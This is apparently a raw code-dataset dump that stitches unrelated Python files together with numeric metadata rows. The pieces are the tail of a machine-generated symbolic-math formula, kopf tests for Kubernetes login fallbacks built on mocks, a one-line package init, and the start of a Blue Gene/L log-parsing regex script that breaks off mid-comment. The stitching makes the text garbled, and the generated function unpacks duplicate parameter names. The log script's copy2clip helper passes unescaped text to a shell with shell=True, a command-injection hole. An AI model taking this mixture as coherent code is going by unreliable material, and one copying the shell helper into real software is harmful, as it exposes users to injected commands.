47040*F**2*U_p**2*m**5*mu_l**2*mu_u**2*n**6 + 6720*F**2*U_p**2*m**6*mu_l**2*mu_u**2*n**5 + 52640*F**2*U_p**2*m**2*mu_l**2*mu_u**2*n**10 + 135520*F**2*U_p**2*m**3*mu_l**2*mu_u**2*n**9 + 135520*F**2*U_p**2*m**4*mu_l**2*mu_u**2*n**8 + 52640*F**2*U_p**2*m**5*mu_l**2*mu_u**2*n**7 + 4480*F**2*U_p**2*m**6*mu_l**2*mu_u**2*n**6 + 47040*F**2*U_p**2*m**2*mu_l**2*mu_u**2*n**11 + 100800*F**2*U_p**2*m**3*mu_l**2*mu_u**2*n**10 + 87360*F**2*U_p**2*m**4*mu_l**2*mu_u**2*n**9 + 26880*F**2*U_p**2*m**5*mu_l**2*mu_u**2*n**8 + 24080*F**2*U_p**2*m**2*mu_l**2*mu_u**2*n**12 + 40880*F**2*U_p**2*m**3*mu_l**2*mu_u**2*n**11 + 31360*F**2*U_p**2*m**4*mu_l**2*mu_u**2*n**10 + 8960*F**2*U_p**2*m**5*mu_l**2*mu_u**2*n**9 - 88*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**6 - 26*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**5 - 8*Kl_p*Ku_p*du**4*m**6*mu_l*mu_u*n**4 - 128*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**8 - 400*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**7 - 50*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**6 - 8*Kl_p*Ku_p*du**4*m**6*mu_l*mu_u*n**5 + 8*Kl_p*Ku_p*du**4*m**7*mu_l*mu_u*n**4 + 888*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**10 + 1564*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**9 + 1008*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**8 + 576*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**7 + 138*Kl_p*Ku_p*du**4*m**6*mu_l*mu_u*n**6 + 34*Kl_p*Ku_p*du**4*m**7*mu_l*mu_u*n**5 + 1664*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**11 + 1924*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**10 + 176*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**9 - 680*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**8 - 176*Kl_p*Ku_p*du**4*m**6*mu_l*mu_u*n**7 + 584*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**12 - 704*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**11 - 2172*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**10 - 1740*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**9 - 200*Kl_p*Ku_p*du**4*m**6*mu_l*mu_u*n**8 - 40*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**13 - 752*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**12 - 960*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**11 - 640*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**10 + 98*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**14 + 154*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**13 + 168*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**12 - 114*Kl_p*Ku_p*du**4*m*mu_l*mu_u*n**13 - 98*Kl_p*Ku_p*du**4*m*mu_l*mu_u*n**14 + 34*Kl_p*Ku_p*du**4*mu_l*mu_u*n**15*r + 8*Kl_p*Ku_p*du**4*mu_l*mu_u*n**16*r - 200*Kl_p*Ku_p*du**4*m*mu_l*mu_u*n**12*r - 176*Kl_p*Ku_p*du**4*m*mu_l*mu_u*n**13*r + 138*Kl_p*Ku_p*du**4*m*mu_l*mu_u*n**14*r - 8*Kl_p*Ku_p*du**4*m*mu_l*mu_u*n**15*r - 8*Kl_p*Ku_p*du**4*m*mu_l*mu_u*n**16*r + 168*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**8*r + 154*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**7*r + 98*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**6*r - 640*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**10*r - 960*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**9*r - 752*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**8*r - 40*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**7*r - 98*Kl_p*Ku_p*du**4*m**6*mu_l*mu_u*n**6*r - 1740*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**11*r - 2172*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**10*r - 704*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**9*r + 584*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**8*r - 114*Kl_p*Ku_p*du**4*m**6*mu_l*mu_u*n**7*r - 680*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**12*r + 176*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**11*r + 1924*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**10*r + 1664*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**9*r + 576*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**13*r + 1008*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**12*r + 1564*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**11*r + 888*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**10*r - 50*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**14*r - 400*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**13*r - 128*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**12*r - 26*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**15*r - 88*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**14*r)/(1680*U_p**2*mu_l**2*mu_u**2*(m + n)**2*(m**2 + 4*m*n**3 + 6*m*n**2 + 4*m*n + n**4)**3)
def free_surface_J(**params):
Ku_p, n, mu_u, m, U_p, n, du, F, r, Kl_p, m, mu_l = \
(params["Ku_p"], params["n"], params["mu_u"], params["m"], params["U_p"],
params["n"], params["du"], params["F"], params["r"], params["Kl_p"],
params["m"], params["mu_l"])
return -(700*Ku_p**2*du**4*m*mu_l*n**9 - 1260*Ku_p**2*du**4*mu_l*n**9 - 420*Ku_p**2*du**4*mu_l*n**10 - 2520*Ku_p**2*du**4*m*mu_l*n**7 - 1890*Ku_p**2*du**4*m*mu_l*n**8 - 945*Ku_p**2*du**4*mu_l*n**8 + 560*Ku_p**2*du**4*m*mu_l*n**10 + 378*Ku_p**2*du**4*mu_l*n**7*r + 1071*Ku_p**2*du**4*mu_l*n**8*r + 987*Ku_p**2*du**4*mu_l*n**9*r + 273*Ku_p**2*du**4*mu_l*n**10*r - 21*Ku_p**2*du**4*mu_l*n**11*r + 252*Ku_p**2*du**4*m**2*mu_l*n**4 + 96*Ku_p**2*du**4*m**3*mu_l*n**3 + 32*Ku_p**2*du**4*m**4*mu_l*n**2 + 756*Ku_p**2*du**4*m**2*mu_l*n**5 + 20*Ku_p**2*du**4*m**3*mu_l*n**4 - 32*Ku_p**2*du**4*m**5*mu_l*n**2 - 1232*Ku_p**2*du**4*m**2*mu_l*n**6 - 1220*Ku_p**2*du**4*m**3*mu_l*n**5 - 272*Ku_p**2*du**4*m**4*mu_l*n**4 - 96*Ku_p**2*du**4*m**5*mu_l*n**3 + 1288*Ku_p**2*du**4*m**2*mu_l*n**7 + 880*Ku_p**2*du**4*m**3*mu_l*n**6 + 464*Ku_p**2*du**4*m**4*mu_l*n**5 + 3059*Ku_p**2*du**4*m**2*mu_l*n**8 + 1232*Ku_p**2*du**4*m**3*mu_l*n**7 + 352*Ku_p**2*du**4*m**4*mu_l*n**6 + 784*Ku_p**2*du**4*m**2*mu_l*n**9 - 224*Ku_p**2*du**4*m**3*mu_l*n**8 - 140*Ku_p**2*du**4*m**2*mu_l*n**10 - 224*Ku_p**2*du**4*m**3*mu_l*n**9 + 672*Ku_p**2*du**4*m**2*mu_l*n**5*r + 1183*Ku_p**2*du**4*m**2*mu_l*n**6*r - 672*Ku_p**2*du**4*m**3*mu_l*n**5*r - 609*Ku_p**2*du**4*m**2*mu_l*n**7*r - 2065*Ku_p**2*du**4*m**3*mu_l*n**6*r - 1911*Ku_p**2*du**4*m**2*mu_l*n**8*r - 2058*Ku_p**2*du**4*m**3*mu_l*n**7*r - 763*Ku_p**2*du**4*m**2*mu_l*n**9*r - 672*Ku_p**2*du**4*m**3*mu_l*n**8*r + 42*Ku_p**2*du**4*m**2*mu_l*n**10*r + 3780*F**2*U_p**2*m**2*mu_l*mu_u**2*n**6 + 7560*F**2*U_p**2*m**3*mu_l*mu_u**2*n**5 + 3780*F**2*U_p**2*m**4*mu_l*mu_u**2*n**4 + 560*F**2*U_p**2*m**5*mu_l*mu_u**2*n**3 + 7560*F**2*U_p**2*m**2*mu_l*mu_u**2*n**7 + 12600*F**2*U_p**2*m**3*mu_l*mu_u**2*n**6 + 3360*F**2*U_p**2*m**4*mu_l*mu_u**2*n**5 + 6300*F**2*U_p**2*m**2*mu_l*mu_u**2*n**8 + 9240*F**2*U_p**2*m**3*mu_l*mu_u**2*n**7 + 1120*F**2*U_p**2*m**4*mu_l*mu_u**2*n**6 + 2520*F**2*U_p**2*m**2*mu_l*mu_u**2*n**9 + 3360*F**2*U_p**2*m**3*mu_l*mu_u**2*n**8 + 420*F**2*U_p**2*m**2*mu_l*mu_u**2*n**10 + 560*F**2*U_p**2*m**3*mu_l*mu_u**2*n**9 + 882*Ku_p**2*du**4*m*mu_l*n**6*r + 2289*Ku_p**2*du**4*m*mu_l*n**7*r + 1512*Ku_p**2*du**4*m*mu_l*n**8*r - 224*Ku_p**2*du**4*m*mu_l*n**9*r - 315*Ku_p**2*du**4*m*mu_l*n**10*r + 21*Ku_p**2*du**4*m*mu_l*n**11*r + 567*Kl_p*Ku_p*du**4*m**2*mu_u*n**7*r + 147*Kl_p*Ku_p*du**4*m**3*mu_u*n**6*r + 516*Kl_p*Ku_p*du**4*m**2*mu_u*n**8*r - 453*Kl_p*Ku_p*du**4*m**3*mu_u*n**7*r - 147*Kl_p*Ku_p*du**4*m**4*mu_u*n**6*r - 212*Kl_p*Ku_p*du**4*m**2*mu_u*n**9*r - 894*Kl_p*Ku_p*du**4*m**3*mu_u*n**8*r - 114*Kl_p*Ku_p*du**4*m**4*mu_u*n**7*r - 375*Kl_p*Ku_p*du**4*m**2*mu_u*n**10*r - 499*Kl_p*Ku_p*du**4*m**3*mu_u*n**9*r - 141*Kl_p*Ku_p*du**4*m**2*mu_u*n**11*r - 114*Kl_p*Ku_p*du**4*m**3*mu_u*n**10*r - 10*Kl_p*Ku_p*du**4*m**2*mu_u*n**12*r + 378*Kl_p*Ku_p*du**4*m*mu_u*n**8*r + 711*Kl_p*Ku_p*du**4*m*mu_u*n**9*r + 489*Kl_p*Ku_p*du**4*m*mu_u*n**10*r + 141*Kl_p*Ku_p*du**4*m*mu_u*n**11*r + 10*Kl_p*Ku_p*du**4*m*mu_u*n**12*r)/(1680*U_p**2*m**3*mu_l*mu_u**2*(n**3 + 3*n**2 + 3*n + m)**3)
| 432.3
| 9,155
| 0.560105
| 4,373
| 12,969
| 1.472216
| 0.043677
| 0.121156
| 0.152843
| 0.136688
| 0.911774
| 0.899037
| 0.88366
| 0.83908
| 0.798695
| 0.773066
| 0
| 0.19183
| 0.06184
| 12,969
| 29
| 9,156
| 447.206897
| 0.337306
| 0
| 0
| 0.470588
| 0
| 0
| 0.004196
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| true
| 0
| 0.294118
| 0
| 0.529412
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 12
|
04768c36685ddc2a30159cc050b8702f52cc0819
| 10,032
|
py
|
Python
|
tests/cli/test_login.py
|
yashbhutwala/kopf
|
4ad77dae699d8516ee7c189b11c6cedbe9224975
|
[
"MIT"
] | 1
|
2019-10-22T19:11:15.000Z
|
2019-10-22T19:11:15.000Z
|
tests/cli/test_login.py
|
yashbhutwala/kopf
|
4ad77dae699d8516ee7c189b11c6cedbe9224975
|
[
"MIT"
] | null | null | null |
tests/cli/test_login.py
|
yashbhutwala/kopf
|
4ad77dae699d8516ee7c189b11c6cedbe9224975
|
[
"MIT"
] | null | null | null |
"""
Remember: We do not test the clients, we assume they work when used properly.
We test our own functions here, and check if the clients were called.
"""
import pytest
import requests
import urllib3
from kopf.clients.auth import login, LoginError, AccessError
RESPONSE_401 = requests.Response()
RESPONSE_401.status_code = 401
@pytest.fixture(autouse=True)
def _auto_clean_kubernetes_client(clean_kubernetes_client):
pass
def test_kubernetes_uninstalled_has_effect(no_kubernetes):
with pytest.raises(ImportError):
import kubernetes
#
# Tests via the direct function invocation.
#
def test_direct_auth_works_incluster_without_client(login_mocks, no_kubernetes):
login()
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
def test_direct_auth_works_viaconfig_without_client(login_mocks, no_kubernetes):
login_mocks.pykube_in_cluster.side_effect = FileNotFoundError
login()
assert login_mocks.pykube_in_cluster.called
assert login_mocks.pykube_from_file.called
def test_direct_auth_works_incluster_with_client(login_mocks, kubernetes):
login()
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.client_in_cluster.called
assert not login_mocks.client_from_file.called
def test_direct_auth_works_viaconfig_with_client(login_mocks, kubernetes):
login_mocks.pykube_in_cluster.side_effect = FileNotFoundError
login_mocks.client_in_cluster.side_effect = kubernetes.config.ConfigException
login()
assert login_mocks.pykube_in_cluster.called
assert login_mocks.pykube_from_file.called
assert login_mocks.client_in_cluster.called
assert login_mocks.client_from_file.called
def test_direct_auth_fails_on_errors_in_pykube(login_mocks, any_kubernetes):
login_mocks.pykube_in_cluster.side_effect = FileNotFoundError
login_mocks.pykube_from_file.side_effect = FileNotFoundError
with pytest.raises(LoginError):
login()
assert login_mocks.pykube_in_cluster.called
assert login_mocks.pykube_from_file.called
def test_direct_auth_fails_on_errors_in_client(login_mocks, kubernetes):
login_mocks.client_in_cluster.side_effect = kubernetes.config.ConfigException
login_mocks.client_from_file.side_effect = kubernetes.config.ConfigException
with pytest.raises(LoginError):
login()
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.client_in_cluster.called
assert login_mocks.client_from_file.called
def test_direct_check_fails_on_tcp_error_in_pykube(login_mocks, any_kubernetes):
login_mocks.pykube_checker.side_effect = requests.exceptions.ConnectionError()
with pytest.raises(AccessError):
login(verify=True)
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
def test_direct_check_fails_on_401_error_in_pykube(login_mocks, any_kubernetes):
login_mocks.pykube_checker.side_effect = requests.exceptions.HTTPError(response=RESPONSE_401)
with pytest.raises(AccessError):
login(verify=True)
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
def test_direct_check_fails_on_tcp_error_in_client(login_mocks, kubernetes):
login_mocks.client_checker.side_effect = urllib3.exceptions.HTTPError()
with pytest.raises(AccessError):
login(verify=True)
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
assert login_mocks.client_in_cluster.called
assert not login_mocks.client_from_file.called
assert login_mocks.client_checker.called
def test_direct_check_fails_on_401_error_in_client(login_mocks, kubernetes):
login_mocks.client_checker.side_effect = kubernetes.client.rest.ApiException(status=401)
with pytest.raises(AccessError):
login(verify=True)
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
assert login_mocks.client_in_cluster.called
assert not login_mocks.client_from_file.called
assert login_mocks.client_checker.called
#
# The same tests, but via the CLI command run.
#
def test_clirun_auth_works_incluster_without_client(login_mocks, no_kubernetes,
invoke, preload, real_run):
result = invoke(['run'])
assert result.exit_code == 0
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
def test_clirun_auth_works_viaconfig_without_client(login_mocks, no_kubernetes,
invoke, preload, real_run):
login_mocks.pykube_in_cluster.side_effect = FileNotFoundError
result = invoke(['run'])
assert result.exit_code == 0
assert login_mocks.pykube_in_cluster.called
assert login_mocks.pykube_from_file.called
def test_clirun_auth_works_incluster_with_client(login_mocks, kubernetes,
invoke, preload, real_run):
result = invoke(['run'])
assert result.exit_code == 0
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
assert login_mocks.client_in_cluster.called
assert not login_mocks.client_from_file.called
assert login_mocks.client_checker.called
def test_clirun_auth_works_viaconfig_with_client(login_mocks, kubernetes,
invoke, preload, real_run):
login_mocks.pykube_in_cluster.side_effect = FileNotFoundError
login_mocks.client_in_cluster.side_effect = kubernetes.config.ConfigException
result = invoke(['run'])
assert result.exit_code == 0
assert login_mocks.pykube_in_cluster.called
assert login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
assert login_mocks.client_in_cluster.called
assert login_mocks.client_from_file.called
assert login_mocks.client_checker.called
def test_clirun_auth_fails_on_config_error_in_pykube(login_mocks, any_kubernetes,
invoke, preload, real_run):
login_mocks.pykube_in_cluster.side_effect = FileNotFoundError
login_mocks.pykube_from_file.side_effect = FileNotFoundError
result = invoke(['run'])
assert result.exit_code != 0
assert 'neither in-cluster, nor via kubeconfig' in result.stdout
assert login_mocks.pykube_in_cluster.called
assert login_mocks.pykube_from_file.called
assert not login_mocks.pykube_checker.called
def test_clirun_auth_fails_on_config_error_in_client(login_mocks, kubernetes,
invoke, preload, real_run):
login_mocks.client_in_cluster.side_effect = kubernetes.config.ConfigException
login_mocks.client_from_file.side_effect = kubernetes.config.ConfigException
result = invoke(['run'])
assert result.exit_code != 0
assert 'neither in-cluster, nor via kubeconfig' in result.stdout
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
assert login_mocks.client_in_cluster.called
assert login_mocks.client_from_file.called
assert not login_mocks.client_checker.called
def test_clirun_check_fails_on_tcp_error_in_pykube(login_mocks, any_kubernetes,
invoke, preload, real_run):
login_mocks.pykube_checker.side_effect = requests.exceptions.ConnectionError()
result = invoke(['run'])
assert result.exit_code != 0
assert 'Please configure the cluster access' in result.stdout
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
def test_clirun_check_fails_on_401_error_in_pykube(login_mocks, any_kubernetes,
invoke, preload, real_run):
login_mocks.pykube_checker.side_effect = requests.exceptions.HTTPError(response=RESPONSE_401)
result = invoke(['run'])
assert result.exit_code != 0
assert 'Please login or configure the tokens' in result.stdout
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
def test_clirun_check_fails_on_tcp_error_in_client(login_mocks, kubernetes,
invoke, preload, real_run):
login_mocks.client_checker.side_effect = urllib3.exceptions.HTTPError()
result = invoke(['run'])
assert result.exit_code != 0
assert 'Please configure the cluster access' in result.stdout
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
assert login_mocks.client_in_cluster.called
assert not login_mocks.client_from_file.called
assert login_mocks.client_checker.called
def test_clirun_check_fails_on_401_error_in_client(login_mocks, kubernetes,
invoke, preload, real_run):
login_mocks.client_checker.side_effect = kubernetes.client.rest.ApiException(status=401)
result = invoke(['run'])
assert result.exit_code != 0
assert 'Please login or configure the tokens' in result.stdout
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
assert login_mocks.client_in_cluster.called
assert not login_mocks.client_from_file.called
assert login_mocks.client_checker.called
| 34.712803
| 97
| 0.763557
| 1,328
| 10,032
| 5.387048
| 0.079066
| 0.169136
| 0.143137
| 0.113783
| 0.930808
| 0.930808
| 0.927174
| 0.926335
| 0.9104
| 0.876433
| 0
| 0.00557
| 0.176734
| 10,032
| 288
| 98
| 34.833333
| 0.860637
| 0.023425
| 0
| 0.816216
| 0
| 0
| 0.025348
| 0
| 0
| 0
| 0
| 0
| 0.513514
| 1
| 0.118919
| false
| 0.005405
| 0.032432
| 0
| 0.151351
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
04ed3f0f96272df9e57f618f45d189ff84b037cf
| 177
|
py
|
Python
|
meg_runtime/git/__init__.py
|
ibedard16/Runtime
|
c2901c36c79bbe835fbe9c94e4500d46eea26f01
|
[
"MIT"
] | null | null | null |
meg_runtime/git/__init__.py
|
ibedard16/Runtime
|
c2901c36c79bbe835fbe9c94e4500d46eea26f01
|
[
"MIT"
] | 5
|
2020-03-24T19:59:38.000Z
|
2020-04-22T03:44:43.000Z
|
meg_runtime/git/__init__.py
|
ibedard16/Runtime
|
c2901c36c79bbe835fbe9c94e4500d46eea26f01
|
[
"MIT"
] | 2
|
2020-03-13T18:35:46.000Z
|
2020-04-11T20:19:20.000Z
|
"""Multimedia Extensible Git runtime Git client interfaces"""
from meg_runtime.git.repository import GitRepository, GitException
from meg_runtime.git.manager import GitManager
| 35.4
| 66
| 0.841808
| 22
| 177
| 6.681818
| 0.636364
| 0.204082
| 0.190476
| 0.231293
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096045
| 177
| 4
| 67
| 44.25
| 0.91875
| 0.310734
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8e0323aa1acb9799ac8bf01d7712df73acf8b8aa
| 92,572
|
py
|
Python
|
data_generation/bgl2.py
|
stefanthaler/2017-ecml-forensic-unsupervised
|
a35a77257e0f571dcc5f272c15e109050c41379b
|
[
"Apache-2.0"
] | 2
|
2018-07-27T05:49:40.000Z
|
2018-11-27T15:34:21.000Z
|
data_generation/bgl2.py
|
stefanthaler/2017-ecml-forensic-unsupervised
|
a35a77257e0f571dcc5f272c15e109050c41379b
|
[
"Apache-2.0"
] | 3
|
2020-09-25T18:53:04.000Z
|
2022-02-09T23:27:00.000Z
|
data_generation/bgl2.py
|
stefanthaler/2017-ecml-forensic-unsupervised
|
a35a77257e0f571dcc5f272c15e109050c41379b
|
[
"Apache-2.0"
] | 5
|
2017-12-21T13:47:05.000Z
|
2020-03-31T12:24:24.000Z
|
"""
Maps similar events to same id
"""
# imports
import argparse # parse command line ptions
import csv # csv files
import re as re # for regular expressions
import os # copy to clipboard
import numpy as np # calculating dataset statistics
import json # dumping results to file
# copy text to clipboard
import subprocess
def copy2clip(txt):
cmd='echo "'+txt.strip()+'"| xsel --clipboard'
return subprocess.check_call(cmd, shell=True)
"""
Helper pattern
"""
#
hexchar = "[0-9a-fA-F]"
hexcharcol = "[0-9a-fA-F:]"
#
hex_address = "0x%s{8}"%hexchar
ip4address = "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
ip4andport ="%s:\d{1,5}"%ip4address
# 1117838570
timestamp = "\d{10}"
# 2005.06.03
date = "20\d{2}?\.\d{2}\.\d{2}"
null_node = "NULL"
unknown_location = "UNKNOWN_LOCATION"
# 2005-06-03-15.42.50.363779
datetime = "20\d{2}?-\d{2}-\d{2}-\d{2}\.\d{2}\.\d{2}\.\d{6}"
# R02-M1-N0-C:J12-U11 | R20-M1-NF-C:J13-U01 | R21-M1-N8-C:J10-U01
nodeid = "R\d{2}-M\d-N\w-\w:J\d{2}-U\d{2}"#|%s|%s)"%(null_node, unknown_location)
# R27-M1-L3-U18-C
# R72-M1-L1-U18-A
nodeid2 = "R\d{2}-M\d-L\d-U\d{2}-\w"#%(null_node, unknown_location)
# R33-M1-ND
nodeid3 = "R\d{2}-M\d-?[NL]?\w?\w?"#"|%s|%s|R\d\d)"%(null_node, unknown_location)
#
rack_id = "R\d{2}"
eight_hex = "%s{8}"%hexchar
# \(unit=0x0b bit=0x17\)
unit_id = "\(unit=0x%s{2} bit=0x%s{2}\)"%(hexchar, hexchar)
# FF:F2:9F:16:E8:42:00:0D:60:E9:17:BD
LP_ADDRESS = "%s{35}"%hexcharcol
"""
if split_line[3]=="NULL":
node_id = "NULL"
elif split_line[3]=="UNKNOWN_LOCATION":
node_id = "UNKNOWN_LOCATION"
elif re.search(r"R\d{2}-M\d-N\w-\w:J\d{2}-U\d{2}",split_line[3]):
node_id = "NODE_ID_01"
elif re.search(r"R\d{2}-M\d-L\d-U\d{2}-\w",split_line[3]):
node_id = "NODE_ID_02"
elif re.search(r"R\d{2}-M\d-?[NL]?\w?",split_line[3]):
node_id = "NODE_ID_03"
else:
node_id = split_line[3]
"""
# (bit=0x09): Torus/Tree/GI read error 0
machine_check_interupt_torus_read_error = "machine check interrupt \(bit=0x09\): Torus/Tree/GI read error 0"
# Ido chip status changed: FF:F2:9F:16:E7:14:00:0D:60:E9:18:EB ip=10.1.1.75 v=13 t=4 status=M Fri Jun 17 07:25:00 PDT 2005
# Ido chip status changed: FF:F2:9F:16:EB:8B:00:0D:60:E9:14:74 ip=10.0.0.140 v=13 t=4 status=M Mon Nov 14 07:14:42 PST 2005
ido_chipstatus_changed = "Ido chip status changed: %s{35} ip=%s v=\d{1,2} t=\d status=\w .+? 2\d{3}"%(hexcharcol,ip4address)
# BglIdoChip table has 2 IDOs with the same IP address \(10.0.0.237\)
bgl_ido_chip_table = "BglIdoChip table has \d+? IDOs with the same IP address \(%s\)"%(ip4address)
# SerialNumber\(000000000000000000000000fff29f16e842000d60e917bd\) IpAddress\(10.0.0.237\) Status\(A\)
serialnumber_ipaddress = "SerialNumber\(%s{48}\) IpAddress\(%s\) Status\(\w\)"%(hexchar,ip4address)
# core.304
generating_core = "generating core\.\d{1,5}?"
# 1 ddr errors(s) detected and corrected on rank 0, symbol 0, bit 3
ddr_error_detected_on_rank = "\d{1,3}? ddr errors\(s\) detected and corrected on rank 0, symbol \d{1,2}?, bit \d"
# total of 1 ddr error(s) detected and corrected
total_ddr_errors = "total of \d+? ddr error\(s\) detected and corrected"
# 3450051 L3 EDRAM error(s) (dcr 0x0157) detected and correcte
l3_edram_error="\d{1,10}? L3 EDRAM error\(s\) \(dcr 0x0157\) detected and corrected"
# CE sym 0, at 0x0b8580c0, mask 0x10
ce_sym="CE sym \d{1,2}?, at 0x%s{8}, mask 0x%s{2}"%(hexchar,hexchar)
# ddr: activating redundant bit steering: rank=0 symbol=0
ddr_redundant_bit_steering="ddr: activating redundant bit steering: rank=0 symbol=\d{1,2}?"
# ddr: excessive soft failures, consider replacing the card
ddr_excessive_soft_failures = "ddr: excessive soft failures, consider replacing the card"
# ciod: Error loading /p/gb2/stella/RAPTOR/65641/raptor: invalid or missing program image, No such file or directory
invalid_missing_program = "ciod: Error loading .+?: invalid or missing program image, No such file or directory"
# 1347195 double-hummer alignment exceptions
double_hummer_exceptions = "\d{1,10}? double-hummer alignment exceptions"
# ciod: X coordinate 8 exceeds physical dimension 8 at line 17 of node map file /home/fgygi/qb/test/h2o/h2o512/txyz1024.map
ciod_xcoordinate_exceeded = "ciod: [XYTZ] coordinate \d+? exceeds physical dimension \d+? at line \d{1,4} of node map file .+?"
# ciodb exited normally with exit code 0
ciodb_exited_normally = "ciodb exited normally with exit code \d{1,2}"
# ciodb exited abnormally due to signal: Aborted
ciodb_exited_abnormally = "ciodb exited abnormally due to signal: .+?"
# Error receiving packet on tree network, expecting type 57 instead of type 3 (softheader=0064588e 8aff0003 00000002 00000000) PSR0=00001f01 PSR1=00000000 PRXF=00000002 PIXF=00000007
error_receiving_packet_tree="Error receiving packet on tree network, expecting type \d{1,2} instead of type \d{1,2} \(softheader=.+?\) .+?"
#ciod: Error creating node map from file /home/fgygi/qb/test/h2o/h2o512/txyz1024.map: Cannot allocate memory
ciod_error_creating_node_map = "ciod: Error creating node map from file /.+?: Cannot allocate memory"
# NULL DISCOVERY INFO New ido chip inserted into the database: FF:F2:9F:16:EE:CF:00:0D:60:E9:11:30 ip=10.0.0.59 v=13 t=4
new_ido_chipset_inserted = "NULL DISCOVERY INFO New ido chip inserted into the database: .+? ip=%s v=\d{1,2} t=\d"%(ip4address)
# 1 tree receiver 2 in re-synch state event(s) (dcr 0x019a) detected
tree_receiver_detected = "\d{1,8} tree receiver \d in re-synch state event\(s\) \(dcr 0x%s{4}\) detected.*?"%(hexchar)
# idoproxydb has been started: : DRV142_2005 $ Input parameters: -enableflush -loguserinfo db.properties BlueGene1
